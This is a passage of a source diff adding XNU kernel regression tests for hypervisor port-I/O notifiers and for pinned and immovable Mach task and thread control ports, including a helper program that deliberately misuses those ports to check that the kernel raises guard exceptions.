+       /* Add with ANY_VALUE and remove. */
+       hret = hv_vm_add_pio_notifier(0xab, 1, 1, notify_port, HV_ION_ANY_VALUE);
+       T_ASSERT_EQ(hret, HV_SUCCESS, "adding notifier with ANY_VALUE");
+       hret = hv_vm_remove_pio_notifier(0xab, 1, 1, notify_port, HV_ION_ANY_VALUE);
+       T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "removing notifier with ANY_VALUE");
+
+       vm_cleanup();
+
+       mach_port_mod_refs(mach_task_self(), notify_port, MACH_PORT_RIGHT_RECEIVE, -1);
+}
+
+T_DECL(pio_notifier_bad_port, "test port IO notifiers when the port is destroyed/deallocated/has no receive right")
+{
+       pthread_t vcpu_thread;
+       mach_port_t notify_port = MACH_PORT_NULL;
+       int handle_io_count = 0;
+       kern_return_t kret = KERN_FAILURE;
+       hv_return_t hret = HV_ERROR;
+
+       /* Setup VM */
+       vm_setup();
+
+       /*
+        * Test that nothing bad happens when the notification port is
+        * added and mach_port_destroy() is called.
+        */
+
+       /* Add a notification port. */
+       kret = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE,
+           &notify_port);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "allocate mach port");
+
+       /* Insert send right. */
+       kret = mach_port_insert_right(mach_task_self(), notify_port, notify_port,
+          MACH_MSG_TYPE_MAKE_SEND);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "insert send right");
+
+       /* All port writes to 0xef. */
+       hret = hv_vm_add_pio_notifier(0xef, 0, 0, notify_port,
+           HV_ION_ANY_VALUE | HV_ION_ANY_SIZE);
+       T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "adding notifier for all writes "
+           "to port 0xef");
+
+       /* After adding, destroy the port. */
+       kret = mach_port_destroy(mach_task_self(), notify_port);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "destroying notify port");
+
+       vcpu_thread = create_vcpu_thread((vcpu_entry_function)
+           (((uintptr_t)pio_entry_basic & PAGE_MASK) + 0x1000), 0, pio_monitor,
+           &handle_io_count);
+       T_ASSERT_POSIX_SUCCESS(pthread_join(vcpu_thread, NULL), "join vcpu");
+
+       /* Expect the messages to be lost. */
+       T_ASSERT_EQ(0, handle_io_count, "0 expected IO exits when port destroyed");
+
+       hret = hv_vm_remove_pio_notifier(0xef, 0, 0, notify_port, HV_ION_ANY_SIZE | HV_ION_ANY_VALUE);
+       T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "removing notifier for all writes to port 0xef");
+
+       vm_cleanup();
+
+
+       vm_setup();
+       /*
+        * Test that nothing bad happens when the notification port is added and
+        * mach_port_mod_refs() is called.
+        */
+
+       /* Add a notification port. */
+       kret = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE,
+           &notify_port);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "allocate mach port");
+
+       /* Insert send right. */
+       kret = mach_port_insert_right(mach_task_self(), notify_port, notify_port,
+          MACH_MSG_TYPE_MAKE_SEND);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "insert send right");
+
+       /* All port writes to 0xef. */
+       hret = hv_vm_add_pio_notifier(0xef, 0, 0, notify_port,
+           HV_ION_ANY_VALUE | HV_ION_ANY_SIZE);
+       T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "adding notifier for all writes "
+           "to port 0xef");
+
+       /* After adding, remove receive right. */
+       kret = mach_port_mod_refs(mach_task_self(), notify_port, MACH_PORT_RIGHT_RECEIVE, -1);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "removing receive right");
+
+       vcpu_thread = create_vcpu_thread((vcpu_entry_function)
+           (((uintptr_t)pio_entry_basic & PAGE_MASK) + 0x1000), 0, pio_monitor,
+           &handle_io_count);
+       T_ASSERT_POSIX_SUCCESS(pthread_join(vcpu_thread, NULL), "join vcpu");
+
+       /* Expect messages to be lost. */
+       T_ASSERT_EQ(0, handle_io_count, "0 expected IO exits when receive right removed");
+
+       hret = hv_vm_remove_pio_notifier(0xef, 0, 0, notify_port, HV_ION_ANY_SIZE | HV_ION_ANY_VALUE);
+       T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "removing notifier for all writes to port 0xef");
+
+       vm_cleanup();
+
+
+       vm_setup();
+       /*
+        * Test that nothing bad happens when the notification port is added and
+        * mach_port_deallocate() is called.
+        */
+
+       /* Add a notification port. */
+       kret = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE,
+           &notify_port);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "allocate mach port");
+
+       /* Insert send right. */
+       kret = mach_port_insert_right(mach_task_self(), notify_port, notify_port,
+          MACH_MSG_TYPE_MAKE_SEND);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "insert send right");
+
+       /* All port writes to 0xef. */
+       hret = hv_vm_add_pio_notifier(0xef, 0, 0, notify_port,
+           HV_ION_ANY_VALUE | HV_ION_ANY_SIZE);
+       T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "adding notifier for all writes "
+           "to port 0xef");
+
+       /* After adding, call mach_port_deallocate(). */
+       kret = mach_port_deallocate(mach_task_self(), notify_port);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "deallocating notify port");
+
+       vcpu_thread = create_vcpu_thread((vcpu_entry_function)
+           (((uintptr_t)pio_entry_basic & PAGE_MASK) + 0x1000), 0, pio_monitor,
+           &handle_io_count);
+       T_ASSERT_POSIX_SUCCESS(pthread_join(vcpu_thread, NULL), "join vcpu");
+
+       /* Expect messages to be lost. */
+       T_ASSERT_EQ(0, handle_io_count, "0 expected IO exits when port deallocated");
+
+       hret = hv_vm_remove_pio_notifier(0xef, 0, 0, notify_port, HV_ION_ANY_SIZE | HV_ION_ANY_VALUE);
+       T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "removing notifier for all writes to port 0xef");
+
+       vm_cleanup();
+}
+
+T_DECL(pio_notifier, "test port IO notifiers")
+{
+       #define MACH_PORT_COUNT 4
+       mach_port_t notify_port[MACH_PORT_COUNT] = { MACH_PORT_NULL };
+       int handle_io_count = 0;
+       kern_return_t kret = KERN_FAILURE;
+       hv_return_t hret = HV_ERROR;
+
+       T_SETUPBEGIN;
+
+       /* Setup notification ports. */
+       for (int i = 0; i < MACH_PORT_COUNT; i++) {
+               kret = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE,
+                   &notify_port[i]);
+               T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "allocate mach port");
+
+               kret = mach_port_insert_right(mach_task_self(), notify_port[i], notify_port[i],
+                  MACH_MSG_TYPE_MAKE_SEND);
+               T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "insert send right");
+       }
+       /* Setup VM */
+       vm_setup();
+
+       T_SETUPEND;
+
+       /* Test that messages are properly sent to mach port notifiers. */
+
+       /* One for all port writes to 0xab. */
+       hret = hv_vm_add_pio_notifier(0xab, 0, 0, notify_port[0],
+           HV_ION_ANY_VALUE | HV_ION_ANY_SIZE);
+       T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "adding notifier for all writes "
+           "to port 0xab");
+
+       /* One for 4 byte writes of 0xaa. */
+       hret = hv_vm_add_pio_notifier(0xab, 4, 0xaa, notify_port[1], HV_ION_NONE);
+       T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "adding notifier for 4 byte writes "
+           "to port 0xab");
+
+       /* One for all writes to 0xcd (ignoring queue full errors). */
+       hret = hv_vm_add_pio_notifier(0xcd, 0, 0, notify_port[2],
+           HV_ION_ANY_SIZE | HV_ION_ANY_VALUE);
+       T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "adding notifier for all writes "
+           "to port 0xcd, ignoring if the queue fills");
+
+       /* One for writes to 0xef asking for exits when the queue is full. */
+       hret = hv_vm_add_pio_notifier(0xef, 0, 0, notify_port[3],
+           HV_ION_ANY_SIZE | HV_ION_ANY_VALUE | HV_ION_EXIT_FULL);
+       T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "adding notifier for all writes "
+           "to port 0xef, not ignoring if the queue fills");
+
+       pthread_t vcpu_thread = create_vcpu_thread((vcpu_entry_function)
+           (((uintptr_t)pio_entry & PAGE_MASK) + 0x1000), 0, pio_monitor,
+           &handle_io_count);
+       T_ASSERT_POSIX_SUCCESS(pthread_join(vcpu_thread, NULL), "join vcpu");
+
+       /* Expect messages to be waiting. */
+       T_ASSERT_EQ(4, get_count(notify_port[0]), "expected 4 messages");
+       T_ASSERT_EQ(1, get_count(notify_port[1]), "expected 1 message");
+       T_ASSERT_EQ(10, get_count(notify_port[2]) + handle_io_count, "expected IO exits");
+       T_ASSERT_EQ(5, get_count(notify_port[3]), "expected 5 messages");
+
+       hret = hv_vm_remove_pio_notifier(0xab, 0, 0, notify_port[0], HV_ION_ANY_SIZE | HV_ION_ANY_VALUE);
+       T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "removing notifier for all writes to port 0xab");
+
+       hret = hv_vm_remove_pio_notifier(0xab, 4, 0xaa, notify_port[1], HV_ION_NONE);
+       T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "removing notifier for 4 byte writes "
+           "to port 0xab");
+
+       hret = hv_vm_remove_pio_notifier(0xcd, 0, 0, notify_port[2], HV_ION_ANY_SIZE | HV_ION_ANY_VALUE);
+       T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "removing notifier for all writes "
+           "to port 0xcd, ignoring if the queue fills");
+
+       hret = hv_vm_remove_pio_notifier(0xef, 0, 0, notify_port[3], HV_ION_ANY_SIZE | HV_ION_ANY_VALUE | HV_ION_EXIT_FULL);
+       T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "removing notifier for all writes "
+           "to port 0xef, not ignoring if the queue fills");
+
+       vm_cleanup();
+
+       for (int i = 0; i < MACH_PORT_COUNT; i++) {
+               mach_port_mod_refs(mach_task_self(), notify_port[i], MACH_PORT_RIGHT_RECEIVE, -1);
+       }
+}
index c2783f5c579bb5dc2275955361c0b24d9bc5656a..461b1dbc45a79693d7c403fd21e36fc5965f5d27 100644 (file)
@@ -482,5 +482,42 @@ _radar60691363_entry:
 
        vmcall
 
+.code16
+
+       // Perform a fixed number of port I/Os with various arguments.
+       .global _pio_entry
+_pio_entry:
+
+       movl    $0xaa, %eax
+
+       outl    %eax, $0xab
+
+       movl    $3, %ecx
+1:     outb    %al, $0xab
+       loop    1b
+
+       movl    $10, %ecx
+1:     outb    %al, $0xcd
+       loop    1b
+
+       movl    $10, %ecx
+1:     outb    %al, $0xef
+       loop    1b
+
+       movl    $0x23456, %eax
+       vmcall
+
+.code16
+       // Perform 10 port I/Os on 0xef.
+       .global _pio_entry_basic
+_pio_entry_basic:
+
+       movl    $10, %ecx
+1:     outb    %al, $0xef
+       loop    1b
+
+       movl    $0x23456, %eax
+       vmcall
+
        .global _hvtest_end
 _hvtest_end:
index 5cb41f34cf87a349d1975c4240e6b396836b8f1d..df15339cee490f91c108202e2b1fbcf029b0cb15 100644 (file)
@@ -13,6 +13,8 @@ extern void radar61961809_entry(uint64_t) OS_NORETURN;
 extern void radar61961809_prepare(uint64_t) OS_NORETURN;
 extern void radar61961809_loop64(uint64_t) OS_NORETURN;
 extern void radar60691363_entry(uint64_t) OS_NORETURN;
+extern void pio_entry(uint64_t) OS_NORETURN;
+extern void pio_entry_basic(uint64_t) OS_NORETURN;
 
 #define MSR_IA32_STAR           0xc0000081
 #define MSR_IA32_LSTAR          0xc0000082
diff --git a/tests/imm_pinned_control_port.c b/tests/imm_pinned_control_port.c
new file mode 100644 (file)
index 0000000..441cdba
--- /dev/null
@@ -0,0 +1,370 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <darwintest.h>
+#include <mach/mach.h>
+#include <mach/mach_vm.h>
+#include <excserver.h>
+#include <sys/sysctl.h>
+#include <spawn.h>
+#include <signal.h>
+#include <TargetConditionals.h>
+
+#define MAX_ARGV 3
+#define EXC_CODE_SHIFT 32
+#define EXC_GUARD_TYPE_SHIFT 29
+#define MAX_TEST_NUM 13
+
+#define TASK_EXC_GUARD_MP_DELIVER 0x10
+
+extern char **environ;
+static uint64_t exception_code = 0;
+static exception_type_t exception_taken = 0;
+
+#define IKOT_TASK_CONTROL               2
+
+/*
+ * This test verifies behaviors of immovable/pinned task/thread ports.
+ *
+ * 1. Compare and verifies port names of mach_{task, thread}_self(),
+ * {TASK, THREAD}_KERNEL_PORT, and ports returned from task_threads()
+ * and processor_set_tasks().
+ * 2. Make sure correct exceptions are raised resulting from moving immovable
+ * task/thread control, read and inspect ports.
+ * 3. Make sure correct exceptions are raised resulting from deallocating pinned
+ * task/thread control ports.
+ * 4. Make sure immovable ports cannot be stashed:
+ * rdar://70585367 (Disallow immovable port stashing with *_set_special_port() and mach_port_register())
+ */
+T_GLOBAL_META(
+       T_META_NAMESPACE("xnu.ipc"),
+       T_META_RUN_CONCURRENTLY(TRUE));
+
+static uint64_t test_exception_code[] = {
+       /* Pinning tests. Currently delivered as soft crash */
+       EXC_GUARD, // Soft crash delivered as EXC_CORPSE_NOTIFY
+       EXC_GUARD,
+       EXC_GUARD,
+       EXC_GUARD,
+       EXC_GUARD,
+
+       /* Immovable tests. Currently delivered as hard crash */
+       (GUARD_TYPE_MACH_PORT << EXC_GUARD_TYPE_SHIFT) | kGUARD_EXC_IMMOVABLE,
+       (GUARD_TYPE_MACH_PORT << EXC_GUARD_TYPE_SHIFT) | kGUARD_EXC_IMMOVABLE,
+       (GUARD_TYPE_MACH_PORT << EXC_GUARD_TYPE_SHIFT) | kGUARD_EXC_IMMOVABLE,
+       (GUARD_TYPE_MACH_PORT << EXC_GUARD_TYPE_SHIFT) | kGUARD_EXC_IMMOVABLE,
+       (GUARD_TYPE_MACH_PORT << EXC_GUARD_TYPE_SHIFT) | kGUARD_EXC_IMMOVABLE,
+       (GUARD_TYPE_MACH_PORT << EXC_GUARD_TYPE_SHIFT) | kGUARD_EXC_IMMOVABLE,
+       (GUARD_TYPE_MACH_PORT << EXC_GUARD_TYPE_SHIFT) | kGUARD_EXC_IMMOVABLE,
+       (GUARD_TYPE_MACH_PORT << EXC_GUARD_TYPE_SHIFT) | kGUARD_EXC_IMMOVABLE,
+};
+
+kern_return_t
+catch_mach_exception_raise_state(mach_port_t exception_port,
+    exception_type_t exception,
+    const mach_exception_data_t code,
+    mach_msg_type_number_t code_count,
+    int * flavor,
+    const thread_state_t old_state,
+    mach_msg_type_number_t old_state_count,
+    thread_state_t new_state,
+    mach_msg_type_number_t * new_state_count)
+{
+#pragma unused(exception_port, exception, code, code_count, flavor, old_state, old_state_count, new_state, new_state_count)
+       T_FAIL("Unsupported catch_mach_exception_raise_state");
+       return KERN_NOT_SUPPORTED;
+}
+
+kern_return_t
+catch_mach_exception_raise_state_identity(mach_port_t exception_port,
+    mach_port_t thread,
+    mach_port_t task,
+    exception_type_t exception,
+    mach_exception_data_t code,
+    mach_msg_type_number_t code_count,
+    int * flavor,
+    thread_state_t old_state,
+    mach_msg_type_number_t old_state_count,
+    thread_state_t new_state,
+    mach_msg_type_number_t * new_state_count)
+{
+#pragma unused(exception_port, thread, task, exception, code, code_count, flavor, old_state, old_state_count, new_state, new_state_count)
+       T_FAIL("Unsupported catch_mach_exception_raise_state_identity");
+       return KERN_NOT_SUPPORTED;
+}
+
+kern_return_t
+catch_mach_exception_raise(mach_port_t exception_port,
+    mach_port_t thread,
+    mach_port_t task,
+    exception_type_t exception,
+    mach_exception_data_t code,
+    mach_msg_type_number_t code_count)
+{
+#pragma unused(exception_port, code_count)
+       pid_t pid;
+       kern_return_t kr = pid_for_task(task, &pid);
+       T_EXPECT_MACH_SUCCESS(kr, "pid_for_task");
+       T_LOG("Crashing child pid: %d, continuing...\n", pid);
+
+       kr = mach_port_deallocate(mach_task_self(), thread);
+       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
+       kr = mach_port_deallocate(mach_task_self(), task);
+       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
+
+       T_LOG("Caught exception type: %d code: 0x%llx", exception, *((uint64_t*)code));
+       if (exception == EXC_GUARD || exception == EXC_CORPSE_NOTIFY) {
+               exception_taken = exception;
+               exception_code = *((uint64_t *)code);
+       } else {
+               T_FAIL("Unexpected exception");
+       }
+       return KERN_SUCCESS;
+}
+
+static void *
+exception_server_thread(void *arg)
+{
+       kern_return_t kr;
+       mach_port_t exc_port = *(mach_port_t *)arg;
+
+       /* Handle exceptions on exc_port */
+       kr = mach_msg_server_once(mach_exc_server, 4096, exc_port, 0);
+       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_msg_server_once");
+
+       return NULL;
+}
+
+static mach_port_t
+alloc_exception_port(void)
+{
+       kern_return_t kret;
+       mach_port_t exc_port = MACH_PORT_NULL;
+       mach_port_t task = mach_task_self();
+
+       kret = mach_port_allocate(task, MACH_PORT_RIGHT_RECEIVE, &exc_port);
+       T_QUIET; T_EXPECT_MACH_SUCCESS(kret, "mach_port_allocate exc_port");
+
+       kret = mach_port_insert_right(task, exc_port, exc_port, MACH_MSG_TYPE_MAKE_SEND);
+       T_QUIET; T_EXPECT_MACH_SUCCESS(kret, "mach_port_insert_right exc_port");
+
+       return exc_port;
+}
+
+static void
+test_immovable_port_stashing(void)
+{
+       kern_return_t kr;
+       mach_port_t port;
+
+       kr = task_set_special_port(mach_task_self(), TASK_BOOTSTRAP_PORT, mach_task_self());
+       T_EXPECT_EQ(kr, KERN_INVALID_RIGHT, "should disallow task_set_special_port() with immovable port");
+
+       kr = thread_set_special_port(mach_thread_self(), THREAD_KERNEL_PORT, mach_thread_self());
+	T_EXPECT_EQ(kr, KERN_INVALID_RIGHT, "should disallow thread_set_special_port() with immovable port");
+
+       mach_port_t stash[1] = {mach_task_self()};
+       kr = mach_ports_register(mach_task_self(), stash, 1);
+       T_EXPECT_EQ(kr, KERN_INVALID_RIGHT, "should disallow mach_ports_register() with immovable port");
+
+       T_QUIET; T_ASSERT_MACH_SUCCESS(mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port), "mach_port_allocate");
+       T_QUIET; T_ASSERT_MACH_SUCCESS(mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND), "mach_port_insert_right");
+
+       stash[0] = port;
+       kr = mach_ports_register(mach_task_self(), stash, 1);
+       T_EXPECT_MACH_SUCCESS(kr, "mach_ports_register() should succeed with movable port");
+}
+
+static void
+test_task_thread_port_values(void)
+{
+       T_LOG("Compare various task/thread control port values\n");
+       kern_return_t kr;
+       mach_port_t port, th_self;
+       thread_array_t threadList;
+       mach_msg_type_number_t threadCount = 0;
+       boolean_t found_self = false;
+       processor_set_name_array_t psets;
+       processor_set_t        pset_priv;
+       task_array_t taskList;
+       mach_msg_type_number_t pcnt = 0, tcnt = 0;
+       mach_port_t host = mach_host_self();
+
+       /* Compare with task/thread_get_special_port() */
+       kr = task_get_special_port(mach_task_self(), TASK_KERNEL_PORT, &port);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "task_get_special_port() - TASK_KERNEL_PORT");
+       T_EXPECT_NE(port, mach_task_self(), "TASK_KERNEL_PORT should not match mach_task_self()");
+       mach_port_deallocate(mach_task_self(), port);
+
+       kr = task_for_pid(mach_task_self(), getpid(), &port);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "task_for_pid()");
+       T_EXPECT_EQ(port, mach_task_self(), "task_for_pid(self) should match mach_task_self()");
+       mach_port_deallocate(mach_task_self(), port);
+
+       th_self = mach_thread_self();
+       kr = thread_get_special_port(th_self, THREAD_KERNEL_PORT, &port);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "thread_get_special_port() - THREAD_KERNEL_PORT");
+       T_EXPECT_NE(port, th_self, "THREAD_KERNEL_PORT should not match mach_thread_self()");
+       mach_port_deallocate(mach_task_self(), port);
+
+       /* Make sure task_threads() return immovable thread ports */
+       kr = task_threads(mach_task_self(), &threadList, &threadCount);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "task_threads()");
+       T_QUIET; T_ASSERT_GE(threadCount, 1, "should have at least 1 thread");
+
+       for (size_t i = 0; i < threadCount; i++) {
+               if (th_self == threadList[i]) { /* th_self is immovable */
+                       found_self = true;
+                       break;
+               }
+       }
+
+       T_EXPECT_TRUE(found_self, "task_threads() should return immovable thread self");
+
+       for (size_t i = 0; i < threadCount; i++) {
+               mach_port_deallocate(mach_task_self(), threadList[i]);
+       }
+
+       if (threadCount > 0) {
+               mach_vm_deallocate(mach_task_self(),
+                   (mach_vm_address_t)threadList,
+                   threadCount * sizeof(mach_port_t));
+       }
+
+       mach_port_deallocate(mach_task_self(), th_self);
+
+       /* Make sure processor_set_tasks() return immovable task self */
+       kr = host_processor_sets(host, &psets, &pcnt);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "host_processor_sets");
+       T_QUIET; T_ASSERT_GE(pcnt, 1, "should have at least 1 processor set");
+
+       kr = host_processor_set_priv(host, psets[0], &pset_priv);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "host_processor_set_priv");
+       for (size_t i = 0; i < pcnt; i++) {
+               mach_port_deallocate(mach_task_self(), psets[i]);
+       }
+       mach_port_deallocate(mach_task_self(), host);
+       vm_deallocate(mach_task_self(), (vm_address_t)psets, (vm_size_t)pcnt * sizeof(mach_port_t));
+
+       kr = processor_set_tasks_with_flavor(pset_priv, TASK_FLAVOR_CONTROL, &taskList, &tcnt);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "processor_set_tasks_with_flavor");
+       T_QUIET; T_ASSERT_GE(tcnt, 1, "should have at least 1 task");
+       mach_port_deallocate(mach_task_self(), pset_priv);
+
+       found_self = false;
+       for (size_t i = 0; i < tcnt; i++) {
+               if (taskList[i] == mach_task_self()) {
+                       found_self = true;
+                       break;
+               }
+       }
+
+	T_EXPECT_TRUE(found_self, "processor_set_tasks() should return immovable task self");
+
+       for (size_t i = 0; i < tcnt; i++) {
+               mach_port_deallocate(mach_task_self(), taskList[i]);
+       }
+
+       if (tcnt > 0) {
+               mach_vm_deallocate(mach_task_self(),
+                   (mach_vm_address_t)taskList,
+                   tcnt * sizeof(mach_port_t));
+       }
+}
+
+T_DECL(imm_pinned_control_port, "Test pinned & immovable task and thread control ports",
+    T_META_IGNORECRASHES(".*imm_pinned_control_port_crasher.*"),
+    T_META_CHECK_LEAKS(false))
+{
+       uint32_t task_exc_guard = 0;
+	size_t te_size = sizeof(task_exc_guard);
+       posix_spawnattr_t       attrs;
+       char *test_prog_name = "./imm_pinned_control_port_crasher";
+       char *child_args[MAX_ARGV];
+       pid_t client_pid = 0;
+       uint32_t opts = 0;
+	size_t size = sizeof(opts);
+       mach_port_t exc_port;
+       pthread_t s_exc_thread;
+       uint64_t exc_id;
+
+       T_LOG("Check if task_exc_guard exception has been enabled\n");
+       int ret = sysctlbyname("kern.task_exc_guard_default", &task_exc_guard, &te_size, NULL, 0);
+       T_ASSERT_EQ(ret, 0, "sysctlbyname");
+
+       if (!(task_exc_guard & TASK_EXC_GUARD_MP_DELIVER)) {
+               T_SKIP("task_exc_guard exception is not enabled");
+       }
+
+       T_LOG("Check if immovable control port has been enabled\n");
+       ret = sysctlbyname("kern.ipc_control_port_options", &opts, &size, NULL, 0);
+
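+	/*
+	 * 0x30 is assumed to mask the immovable-control-port enablement bits of
+	 * kern.ipc_control_port_options; if neither bit is set, the enforcement
+	 * exercised by this test is off.
+	 */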
+       if (!ret && (opts & 0x30) == 0) {
+               T_SKIP("immovable control port isn't enabled");
+       }
+
+       /* first, try out comparing various task/thread ports */
+       test_task_thread_port_values();
+
+       /* try stashing immovable ports: rdar://70585367 */
+       test_immovable_port_stashing();
+
+       /* spawn a child and see if EXC_GUARD are correctly generated */
+       for (int i = 0; i < MAX_TEST_NUM; i++) {
+               /* Create the exception port for the child */
+               exc_port = alloc_exception_port();
+               T_QUIET; T_ASSERT_NE(exc_port, MACH_PORT_NULL, "Create a new exception port");
+
+               /* Create exception serving thread */
+               ret = pthread_create(&s_exc_thread, NULL, exception_server_thread, &exc_port);
+               T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "pthread_create exception_server_thread");
+
+               /* Initialize posix_spawn attributes */
+               posix_spawnattr_init(&attrs);
+
+               int err = posix_spawnattr_setexceptionports_np(&attrs, EXC_MASK_GUARD | EXC_MASK_CORPSE_NOTIFY, exc_port,
+                   (exception_behavior_t) (EXCEPTION_DEFAULT | MACH_EXCEPTION_CODES), 0);
+		T_QUIET; T_ASSERT_POSIX_SUCCESS(err, "posix_spawnattr_setexceptionports_np");
+
+               child_args[0] = test_prog_name;
+               char test_num[10];
+               sprintf(test_num, "%d", i);
+               child_args[1] = test_num;
+               child_args[2] = NULL;
+
+               T_LOG("========== Spawning new child ==========");
+               err = posix_spawn(&client_pid, child_args[0], NULL, &attrs, &child_args[0], environ);
+               T_ASSERT_POSIX_SUCCESS(err, "posix_spawn control_port_options_client = %d test_num = %d", client_pid, i);
+
+               /* try extracting child task port: rdar://71744817
+                * Moved to tests/extract_right_soft_fail.c
+                */
+               // test_extract_immovable_task_port(client_pid);
+
+               int child_status;
+               /* Wait for child and check for exception */
+               if (-1 == waitpid(-1, &child_status, 0)) {
+                       T_FAIL("waitpid: child mia");
+               }
+
+               if (WIFEXITED(child_status) && WEXITSTATUS(child_status)) {
+                       T_FAIL("Child exited with status = %x", child_status);
+                       T_END;
+               }
+
+               sleep(1);
+		kill(client_pid, SIGKILL);
+
+               ret = pthread_join(s_exc_thread, NULL);
+               T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "pthread_join");
+
+               if (exception_taken == EXC_GUARD) {
+                       exc_id = exception_code >> EXC_CODE_SHIFT;
+               } else {
+                       exc_id = exception_code;
+               }
+
+               T_LOG("Exception code: Received code = 0x%llx Expected code = 0x%llx", exc_id, test_exception_code[i]);
+               T_EXPECT_EQ(exc_id, test_exception_code[i], "Exception code: Received == Expected");
+       }
+}
diff --git a/tests/imm_pinned_control_port_crasher.c b/tests/imm_pinned_control_port_crasher.c
new file mode 100644 (file)
index 0000000..951ef9e
--- /dev/null
@@ -0,0 +1,262 @@
+#include <mach/mach.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <assert.h>
+
+/*
+ * DO NOT run this test file by itself.
+ * This test is meant to be invoked by control_port_options darwintest.
+ *
+ * If hard enforcement for pinned control ports is on, the pinned tests (indices 0-4,
+ * pinned_test_main_thread_mod_ref through pinned_test_task_threads_mod_ref) are
+ * expected to generate a fatal EXC_GUARD.
+ *
+ * If hard enforcement for immovable control ports is on, the immovable tests (indices 5-12,
+ * immovable_test_move_send_task_self through immovable_test_copy_send_thread_read) are
+ * expected to generate a fatal EXC_GUARD.
+ *
+ * The type of exception raised (if any) is checked on control_port_options side.
+ */
+#define MAX_TEST_NUM 13
+
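+/*
+ * Helper: allocate a throwaway receive right and try to enqueue a message
+ * carrying `port` as a descriptor with the requested disposition.  For pinned
+ * or immovable rights the kernel is expected to reject the copyin (or raise
+ * the corresponding EXC_GUARD) before the message is ever received.
+ */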
+static int
+attempt_send_immovable_port(mach_port_name_t port, mach_msg_type_name_t disp)
+{
+       mach_port_t server;
+       kern_return_t kr;
+       kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &server);
+       assert(kr == 0);
+
+       kr = mach_port_insert_right(mach_task_self(), server, server, MACH_MSG_TYPE_MAKE_SEND);
+       assert(kr == 0);
+
+       struct {
+               mach_msg_header_t header;
+               mach_msg_body_t body;
+               mach_msg_port_descriptor_t desc;
+       } msg;
+
+       msg.header.msgh_remote_port = server;
+       msg.header.msgh_local_port = MACH_PORT_NULL;
+       msg.header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0) | MACH_MSGH_BITS_COMPLEX;
+       msg.header.msgh_size = sizeof msg;
+
+       msg.body.msgh_descriptor_count = 1;
+
+       msg.desc.name = port;
+       msg.desc.disposition = disp;
+       msg.desc.type = MACH_MSG_PORT_DESCRIPTOR;
+
+       return mach_msg_send(&msg.header);
+}
+
+static void
+pinned_test_main_thread_mod_ref()
+{
+       printf("[Crasher]: Mod refs main thread's self port to 0\n");
+       mach_port_t thread_self = mach_thread_self();
+       kern_return_t kr = mach_port_mod_refs(mach_task_self(), thread_self, MACH_PORT_RIGHT_SEND, -2);
+
+	printf("[Crasher pinned_test_main_thread_mod_ref] mach_port_mod_refs returned %s.\n", mach_error_string(kr));
+}
+
+static void*
+pthread_run()
+{
+       printf("[Crasher]: Deallocate pthread_self\n");
+       mach_port_t th_self = pthread_mach_thread_np(pthread_self());
+       kern_return_t kr = mach_port_deallocate(mach_task_self(), th_self);
+
+	printf("[Crasher pinned_test_pthread_dealloc] mach_port_deallocate returned %s.\n", mach_error_string(kr));
+       return NULL;
+}
+
+static void
+pinned_test_pthread_dealloc()
+{
+       printf("[Crasher]: Create a pthread and deallocate its self port\n");
+       pthread_t thread;
+       int ret = pthread_create(&thread, NULL, pthread_run, NULL);
+       assert(ret == 0);
+       ret = pthread_join(thread, NULL);
+       assert(ret == 0);
+}
+
+static void
+pinned_test_task_self_dealloc()
+{
+       printf("[Crasher]: Deallocate mach_task_self twice\n");
+       mach_port_t task_self = mach_task_self();
+       kern_return_t kr = mach_port_deallocate(task_self, task_self);
+       assert(kr == 0);
+       kr = mach_port_deallocate(task_self, task_self);
+
